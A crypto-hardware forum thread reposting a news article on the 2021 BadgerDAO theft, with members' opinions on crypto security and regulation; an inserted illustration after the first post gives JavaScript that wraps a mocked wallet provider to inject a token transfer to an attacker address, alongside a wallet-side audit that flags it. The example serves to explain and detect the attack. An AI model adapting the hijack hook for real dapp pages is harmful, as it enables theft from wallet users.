EVGA

BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack

Author
rjohnson11
EVGA Forum Moderator
  • Total Posts : 102262
  • Reward points : 0
  • Joined: 2004/10/05 12:44:35
  • Location: Netherlands
  • Status: offline
  • Ribbons : 84
2021/12/03 00:24:37 (permalink)
https://www.techpowerup.com/289569/badgerdao-sees-usd-120-million-crypto-heist-via-cloudflare-hack
 
BadgerDAO, "one of the most security-minded DAOs in operation", has been hit with a cryptocurrency heist enabled via a JavaScript hack on their website. BadgerDAO enables Bitcoin holders to "bridge" their cryptocurrency over to the smart-contract and DeFi-enabled Ethereum platform via its token, thus allowing access to the world of decentralized finance. After preliminary investigations aided by blockchain security and data analytics firm Peckshield, it seems that the bad actors inserted a malicious script in the BadgerDAO website - in turn intercepting Web3 transactions and inserting a request to transfer the victim's tokens to the attacker's chosen address. It's currently estimated that around $120 million were siphoned off via this attack. A single transfer saw 896 Bitcoin being diverted this way - a cool $50 million.

As soon as BadgerDAO became aware of suspect wallet activity, the company immediately froze all smart contracts running in its platform - a way to stem the bleeding until the security audit could be conducted. Thursday night, BadgerDAO announced it had "retained data forensics experts Chainalysis to explore the full scale of the incident & authorities in both the US & Canada have been informed & Badger is cooperating fully with external investigations as well as proceeding with its own."
 
According to BadgerDAO, the attacker managed to access the Cloudflare API used by the company without triggering the two-factor authentication protection that should have been enabled. Of course, two-factor (or multi-factor) authentication can and has been subverted before; there have been multiple instances of phishing attempts that manage to cross the bridge over to 2FA keys, and there are even toolkits available that automate the entire process. While it's still one of the most cost-effective ways to increase security access whenever credentials are involved, like every security measure, it requires attentive user interactions.
 
The poor security will probably open the door to lawsuits in my personal opinion. 
 
 

AMD Ryzen 9 7950X,  Corsair Mp700 Pro M.2, 64GB Corsair Dominator Titanium DDR5  X670E Steel Legend, MSI RTX 4090 Associate Code: H5U80QBH6BH0AXF. I am NOT an employee of EVGA

#1
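The mechanism the quoted article sketches (a script injected into the dapp's page intercepts Web3 transactions and inserts a transfer of the victim's tokens to the attacker's address), as an added illustration that is not part of the original post, BadgerDAO's code or the attacker's script. It mocks an EIP-1193 provider (the role window.ethereum plays in a browser), installs a page-side hook of that kind, and then runs a wallet-side audit that decodes ERC-20 calldata and flags transfers or approvals aimed at addresses outside the dapp's allowlist. It goes slightly beyond the article by also catching approve(), the other way a dapp can be made to hand tokens to a third party. The token, vault, user and attacker addresses, the allowlist and the provider are constructed placeholders; the mock provider is synchronous where the real one returns Promises.

```javascript
// Added illustration, not BadgerDAO's code and not the attacker's script.
// All addresses, the allowlist and the provider below are constructed placeholders.

const SEL_TRANSFER = "a9059cbb"; // first 4 bytes of keccak256("transfer(address,uint256)")
const SEL_APPROVE  = "095ea7b3"; // first 4 bytes of keccak256("approve(address,uint256)")

const strip0x = (h) => (h.startsWith("0x") ? h.slice(2) : h);
const pad32   = (h) => strip0x(h).toLowerCase().padStart(64, "0"); // one 32-byte ABI word

// ERC-20 calldata layout: 4-byte selector, 32-byte address word, 32-byte amount word.
function encodeErc20(selector, to, amountHex) {
  return "0x" + selector + pad32(to) + pad32(amountHex);
}

// Decode calldata into {fn, to, amount}; null for anything that is not transfer/approve.
function decodeErc20(data) {
  const d = strip0x(data || "").toLowerCase();
  if (d.length !== 8 + 64 + 64) return null;
  const fn = { [SEL_TRANSFER]: "transfer", [SEL_APPROVE]: "approve" }[d.slice(0, 8)];
  if (!fn) return null;
  return { fn, to: "0x" + d.slice(32, 72), amount: BigInt("0x" + d.slice(72)) };
}

// Stand-in for window.ethereum: records every transaction handed to it.
// Synchronous for the example; a real EIP-1193 provider returns a Promise.
function makeProvider() {
  const sent = [];
  return {
    sent,
    request({ method, params }) {
      if (method !== "eth_sendTransaction") throw new Error("mock: unsupported " + method);
      sent.push(params[0]);
      return "0x" + "ab".repeat(32); // fake transaction hash
    },
  };
}

// Injected-script behaviour: wrap request() so that before each legitimate
// send, a transfer of the victim's balance goes to the attacker's address.
// balanceHex stands in for the balance such a script would have looked up.
function installHijack(provider, tokenAddr, attackerAddr, balanceHex) {
  const original = provider.request.bind(provider);
  provider.request = (args) => {
    if (args.method === "eth_sendTransaction") {
      const victim = args.params[0].from;
      original({ method: "eth_sendTransaction", params: [{
        from: victim, to: tokenAddr, data: encodeErc20(SEL_TRANSFER, attackerAddr, balanceHex),
      }] });
    }
    return original(args); // the user still sees the transaction they expected
  };
}

// Wallet-side audit: anything that moves or delegates tokens to an address
// the dapp is not known to use gets flagged for the user before signing.
function auditTx(tx, trustedAddrs) {
  const trusted = new Set(trustedAddrs.map((a) => a.toLowerCase()));
  const call = decodeErc20(tx.data);
  if (!call) return { ok: true, reason: "not an ERC-20 transfer/approve" };
  if (!trusted.has(call.to)) return { ok: false, reason: `${call.fn} to untrusted ${call.to}` };
  return { ok: true, reason: `${call.fn} to trusted ${call.to}` };
}

// Scenario: the user approves the dapp's vault for 1000 tokens while the page
// script is hijacked; returns the audit verdict for each transaction that was sent.
function runScenario() {
  const TOKEN    = "0x" + "01".repeat(20); // placeholder token contract
  const VAULT    = "0x" + "02".repeat(20); // placeholder contract the dapp legitimately uses
  const ATTACKER = "0x" + "ba".repeat(20); // placeholder attacker address
  const USER     = "0x" + "03".repeat(20); // placeholder victim account
  const provider = makeProvider();
  installHijack(provider, TOKEN, ATTACKER, (5000n).toString(16));
  provider.request({ method: "eth_sendTransaction", params: [{
    from: USER, to: TOKEN, data: encodeErc20(SEL_APPROVE, VAULT, (1000n).toString(16)),
  }] });
  return provider.sent.map((tx) => ({ to: tx.to, ...auditTx(tx, [VAULT]) }));
}
```

runScenario() shows two transactions reaching the provider where the user intended one: the injected transfer to the attacker is flagged, the intended approve to the vault passes. The point of the example is where the audit runs: a check shipped in the dapp's own JavaScript is worthless here, because the injected script executes with the same privileges on the same page and can remove or rewrap it just as it wrapped request(); the decode-and-compare has to happen in the wallet's signing prompt (or by the user reading it). Subresource Integrity and a strict Content Security Policy raise the cost of getting a script onto the page in the first place, but an attacker who can change what the CDN serves, as the article says happened through the Cloudflare API, can change those headers too.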

18 Replies

    Hoggle
    EVGA Forum Moderator
    • Total Posts : 10101
    • Reward points : 0
    • Joined: 2003/10/13 22:10:45
    • Location: Eugene, OR
    • Status: offline
    • Ribbons : 4
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 03:03:54 (permalink)
    rjohnson11
    The poor security will probably open the door to lawsuits in my personal opinion.

    I would wonder if lawsuits would really work since I don't think the United States or Canada are really ready to say bitcoin has value until it's sold for cash. The fact that most countries treat bitcoin as a digital item the same as say buying an item in a game means it's hard to see the case really awarding the value of the bitcoin. The same problem happens with collectibles in which someone could have a rare comic that goes for $700 but it can be considered only worth the original face value legally until it's been appraised.

    Use an Associates Code & SAVE 5% - 10% on your purchase. Just click on the associates banner to save, or enter the associates code at checkout on your next purchase. If you choose to use my code I want to personally say "Thank You" for using it. 
     
     
    #2
    Flint 1760
    Omnipotent Enthusiast
    • Total Posts : 8295
    • Reward points : 0
    • Joined: 2009/04/26 15:44:26
    • Status: offline
    • Ribbons : 45
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 04:19:45 (permalink)
    Cryptocurrency is just becoming another target and we will see increasing incidents.  This, and the other thefts, should be a huge warning call to any firm in the business.
     
    Somehow I don't think this one will end up with the miscreants getting job offers.
    post edited by Flint 1760 - 2021/12/03 04:35:23


    #3
    Grey_Beard
    CLASSIFIED Member
    • Total Posts : 2232
    • Reward points : 0
    • Joined: 2013/12/23 11:50:37
    • Location: The Land of Milk and Honey
    • Status: offline
    • Ribbons : 10
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 04:26:59 (permalink)
    Another reason to stay away from cryptocurrency.  Amazing that this keeps happening.  But hey, you can track this stuff.  LLLLOOOOOLLLLLLL!  This stuff is made for criminals and no matter what anyone says, it is not secure nor is it traceable.  It is definitely every criminal’s currency for sure.
    post edited by Grey_Beard - 2021/12/03 12:00:04



    #4
    ty_ger07
    Insert Custom Title Here
    • Total Posts : 21171
    • Reward points : 0
    • Joined: 2008/04/10 23:48:15
    • Location: traveler
    • Status: online
    • Ribbons : 270
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 08:48:28 (permalink)
    It's funny how websites continue to cause cryptocurrency to be stolen when it is otherwise impossible to steal. When will this end? There should be money in it for someone who finds a solution.

    ASRock Z77 • Intel Core i7 3770K • EVGA GTX 1080 • Samsung 850 Pro • Seasonic PRIME 600W Titanium
    My EVGA Score: 1546 • Zero Associates Points • I don't shill

    #5
    nomoss
    FTW Member
    • Total Posts : 1559
    • Reward points : 0
    • Joined: 2009/04/04 19:45:27
    • Status: offline
    • Ribbons : 7
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 08:56:57 (permalink)
    All the tears I shed for people losing their environment destroying "currency" could fit on the head of a pin.

    Associates code:  9OYA1P1FRHQ3SGN
    Imgur    modsrigs:  Chemical X   RedWing   Utonium   TY for the +1s! 

    #6
    Miguell
    FTW Member
    • Total Posts : 1112
    • Reward points : 0
    • Joined: 2008/04/16 14:43:51
    • Location: Portugal
    • Status: offline
    • Ribbons : 0
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 09:24:30 (permalink)
    nomoss
    All the tears I shed for people losing their environment destroying "currency" could fit on the head of a pin.


     
    you and me both
    unfortunately people want easy money.. it's an old human desire!
     
    crypto provides just that and it won't die .. as a matter of fact i believe most of the people who lost big chunks of their savings will enter the crypto market again... as soon as they can..
     
    already saw a documentary about this.. and they admit that despite losing they would try again because.... it's easy money!
     
    greed will beat the will to have a 9 to 5 job for 40 years any day...
     
     
    post edited by Miguell - 2021/12/03 14:40:53

    Case: Cooler Master Stacker 830
    Display: 32" AOC Q3279VWFD8 @2560x1440@75Hz
    Cpu: Intel Core i7-8700
    Cpu Cooler: Cooler Master - MasterLiquid ML120L - RGB
    Mobo: Asus ROG Strix Z390-H Gaming
    Vga: Asus Dual RTX 4060 Ti 16GB Advanced Edition
    Ram: 32GB DDR4  G.SKILL - RIPJAWS V @3200Mhz
    Sound: Hama uRage soundZbar 2.1 Unleashed  - (Optical)
    Storage: 500GB SSD M.2 A2000  NVMe  Kingston (OS) + 8TB (4+4) HDD X300 Toshiba (Data)
    Psu: SeaSonic M12 700W
    Os: W10 Pro 64Bit
    #7
    Grey_Beard
    CLASSIFIED Member
    • Total Posts : 2232
    • Reward points : 0
    • Joined: 2013/12/23 11:50:37
    • Location: The Land of Milk and Honey
    • Status: offline
    • Ribbons : 10
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 12:01:42 (permalink)
    ty_ger07
    It's funny how websites continue to cause cryptocurrency to be stolen when it is otherwise impossible to steal. When will this end? There should be money in it for someone who finds a solution.

    Eventually you will realize the money is in the theft not stopping it.  You mention this is impossible to steal while posting in a thread about it getting stolen.  Hmmm.



    #8
    kram36
    The Destroyer
    • Total Posts : 21477
    • Reward points : 0
    • Joined: 2009/10/27 19:00:58
    • Location: United States
    • Status: offline
    • Ribbons : 72
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 13:02:40 (permalink)
    Grey_Beard
    ty_ger07
    It's funny how websites continue to cause cryptocurrency to be stolen when it is otherwise impossible to steal. When will this end? There should be money in it for someone who finds a solution.

    Eventually you will realize the money is in the theft not stopping it.  You mention this is impossible to steal while posting in a thread about it getting stolen.  Hmmm.


    If you keep your digital assets in your own reputable private wallet and don't store the passkey where someone can find it on your pc, it's pretty much impossible to steal. With a cold storage wallet, you're pretty much golden.
     
    Leaving your digital assets on a website is not a smart move.
    post edited by kram36 - 2021/12/03 13:07:19
    #9
    ty_ger07
    Insert Custom Title Here
    • Total Posts : 21171
    • Reward points : 0
    • Joined: 2008/04/10 23:48:15
    • Location: traveler
    • Status: online
    • Ribbons : 270
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 13:36:31 (permalink)
    Grey_Beard
    ty_ger07
    It's funny how websites continue to cause cryptocurrency to be stolen when it is otherwise impossible to steal. When will this end? There should be money in it for someone who finds a solution.

    Eventually you will realize the money is in the theft not stopping it.  You mention this is impossible to steal while posting in a thread about it getting stolen.  Hmmm.

    When you give it to someone else, it can be stolen. If you keep it to yourself, it is impossible to steal. It gets stolen when a service you use to buy, sell, or transfer it doesn't safely guard the keys they use, an inside job happens, or when someone tricks you into transferring it to the wrong person. Every one of these thefts falls under one or more of those categories. It is impossible to steal in the conventional sense.


    #10
    castrator86
    SSC Member
    • Total Posts : 816
    • Reward points : 0
    • Joined: 2010/07/24 09:33:21
    • Status: offline
    • Ribbons : 2
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 13:37:44 (permalink)
    kram36
    If you keep your digital assets in your own reputable private wallet and don't store the passkey where someone can find it on your pc, it's pretty much impossible to steal. A cold storage wallet, you're pretty much golden.
     
    Leaving your digital assets on a website is not a smart move.

    Bingo. Unless you store it on a USB key back in 2009 while at college and then lose it... It pains me to look at BC prices knowing I had 3 or 4 on a USB drive that got dropped/lost/thrown out.



    #11
    Hoggle
    EVGA Forum Moderator
    • Total Posts : 10101
    • Reward points : 0
    • Joined: 2003/10/13 22:10:45
    • Location: Eugene, OR
    • Status: offline
    • Ribbons : 4
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 14:28:28 (permalink)
    Miguell
    nomoss
    All the tears I shed for people losing their environment destroying "currency" could fit on the head of a pin.
     
    you and me both
    unfortunately people want easy money.. it's an old human desire!
     
    crypto provides just that and it won't die .. as a matter of fact i believe most of the people who lost big chunks of their savings... will enter the crypto market again... as soon as they can..
     
    already saw a documentary about this.. and they admit that despite losing they would try again because.... it's easy money!
     
    greed will beat the will to have a 9 to 5 job for 40 years any day...

    I agree that it's greed that will beat having a regular job but I also feel crypto probably has a lot of backing by illegal organized criminal activity and that backing could help keep the prices up instead of dropping as it's easy to transfer crypto compared to cash across borders.

    #12
    Nereus
    Captain Goodvibes
    • Total Posts : 18916
    • Reward points : 0
    • Joined: 2009/04/09 20:05:53
    • Location: Brooklyn, NYC.
    • Status: online
    • Ribbons : 58
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/05 11:15:22 (permalink)
     
    Soon as Bitcoin and other cryptocurrencies are recognized as official legal tender (like El Salvador has), then this effectively becomes a very large bank heist. People who hack into and rob banks get serious jail time. The same should apply for crypto. Until then, it's basically a digital California - take whatever you want, nobody is going to do anything about it other than maybe give a light smack on the hand for being naughty, and for the victims.. cry me a river.
     


      BUILD 1 2   |   MINI-ITX BUILD   |   MODSRIGS $1K WIN   |   HEATWARE 111-0-0   |   ASSOCIATE CODE CSKKXUT5Q9GVAFR

    #13
    Miguell
    FTW Member
    • Total Posts : 1112
    • Reward points : 0
    • Joined: 2008/04/16 14:43:51
    • Location: Portugal
    • Status: offline
    • Ribbons : 0
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/05 12:48:44 (permalink)
    Nereus
     
    Soon as Bitcoin and other cryptocurrencies are recognized as official legal tender (like El Salvador has), then this effectively becomes a very large bank heist. People who hack into and rob banks get serious jail time. The same should apply for crypto. Until then, it's basically a digital California - take whatever you want, nobody is going to do anything about it other than maybe give a light smack on the hand for being naughty, and for the victims.. cry me a river.
     




    you may be right.. it SHOULD be recognized... at least BC should because it's the oldest one!
     
    but who is gonna recognize it and most important WHO is gonna regulate all this digital cash flow around the world??
    we are talking tons and tons of money (zeros and ones) flowing every day between servers and countries!
     
    crypto has no country and knows no borders! i'm not sure how this would be regulated...
     
     

    #14
    ty_ger07
    Insert Custom Title Here
    • Total Posts : 21171
    • Reward points : 0
    • Joined: 2008/04/10 23:48:15
    • Location: traveler
    • Status: online
    • Ribbons : 270
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/05 19:13:11 (permalink)
    Miguell
    crypto has no country and knows no borders!  i'm not sure how this would be regulated...

    It's regulated in the United States. It is probably regulated in many other countries too. In the United States at least, it's more a matter of enforcement and choosing to follow regulation. KYC laws, AML laws, tax laws, and the Patriot Act pretty well have cryptocurrency fully regulated in the United States.


    #15
    Grey_Beard
    CLASSIFIED Member
    • Total Posts : 2232
    • Reward points : 0
    • Joined: 2013/12/23 11:50:37
    • Location: The Land of Milk and Honey
    • Status: offline
    • Ribbons : 10
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/06 13:59:13 (permalink)
    Seems they have resorted to begging. I guess it’s secure if you include successful begging. The crypto-calamity continues.

    “Now, the blockchain "bridge" protocol BadgerDAO is pleading with the hacker to return the stolen funds.”

    https://www.vice.com/en/a...turn-dollar119-million
    post edited by Grey_Beard - 2021/12/06 14:25:20



    #16
    Nereus
    Captain Goodvibes
    • Total Posts : 18916
    • Reward points : 0
    • Joined: 2009/04/09 20:05:53
    • Location: Brooklyn, NYC.
    • Status: online
    • Ribbons : 58
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/06 14:13:45 (permalink)
     
    Wow.. $120m stolen from BadgerDAO, then $150m from BitMart.. Seems safer to just stuff your mattress with cash.
     



    #17
    Flint 1760
    Omnipotent Enthusiast
    • Total Posts : 8295
    • Reward points : 0
    • Joined: 2009/04/26 15:44:26
    • Status: offline
    • Ribbons : 45
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/06 15:26:12 (permalink)
    If they have resorted to begging, then you know they have some real problems.  Might work better to offer a "finders fee" and a six figure salary job as was done a couple of months ago after a theft.


    #18
    ty_ger07
    Insert Custom Title Here
    • Total Posts : 21171
    • Reward points : 0
    • Joined: 2008/04/10 23:48:15
    • Location: traveler
    • Status: online
    • Ribbons : 270
    Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/06 20:14:59 (permalink)
    Nereus
     Wow.. $120m stolen from BadgerDAO, then $150m from BitMart.. Seems safer to just stuff your mattress with cash.
     

    Or keep it in a crypto wallet and not move it around.


    #19